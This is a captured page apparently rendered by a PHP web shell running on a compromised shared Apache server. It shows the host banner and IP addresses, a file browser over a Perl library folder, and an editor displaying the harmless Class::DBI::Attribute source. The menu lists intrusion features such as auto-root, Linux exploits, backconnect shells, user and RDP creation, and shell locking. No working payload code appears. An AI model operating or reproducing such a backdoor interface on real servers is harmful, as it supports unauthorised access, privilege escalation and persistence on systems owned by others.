Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
Class /
DBI /
[ HOME SHELL ]
Name
Size
Permission
Action
Cascade
[ DIR ]
drwxr-xr-x
Relationship
[ DIR ]
drwxr-xr-x
SQL
[ DIR ]
drwxr-xr-x
Search
[ DIR ]
drwxr-xr-x
Test
[ DIR ]
drwxr-xr-x
Attribute.pm
685
B
-rw-r--r--
Column.pm
1.36
KB
-rw-r--r--
ColumnGrouper.pm
3.61
KB
-rw-r--r--
Iterator.pm
2.23
KB
-rw-r--r--
Query.pm
4.17
KB
-rw-r--r--
Relationship.pm
4.02
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Attribute.pm
package Class::DBI::Attribute; =head1 NAME Class::DBI::Attribute - A value in a column. =head1 SYNOPSIS my $column = Class::DBI::Attribute->new($column => $value); =head1 DESCRIPTION This stores the row-value of a certain column in an object. You probably shouldn't be dealing with this directly, and its interface is liable to change without notice. =head1 METHODS =cut use strict; use base 'Class::Accessor::Fast'; __PACKAGE__->mk_accessors(qw/column current_value known/); use overload '""' => sub { shift->current_value }, fallback => 1; sub new { my ($class, $col, $val) = @_; $class->SUPER::new({ column => $col, current_value => $val, known => 1, }); } 1;
Close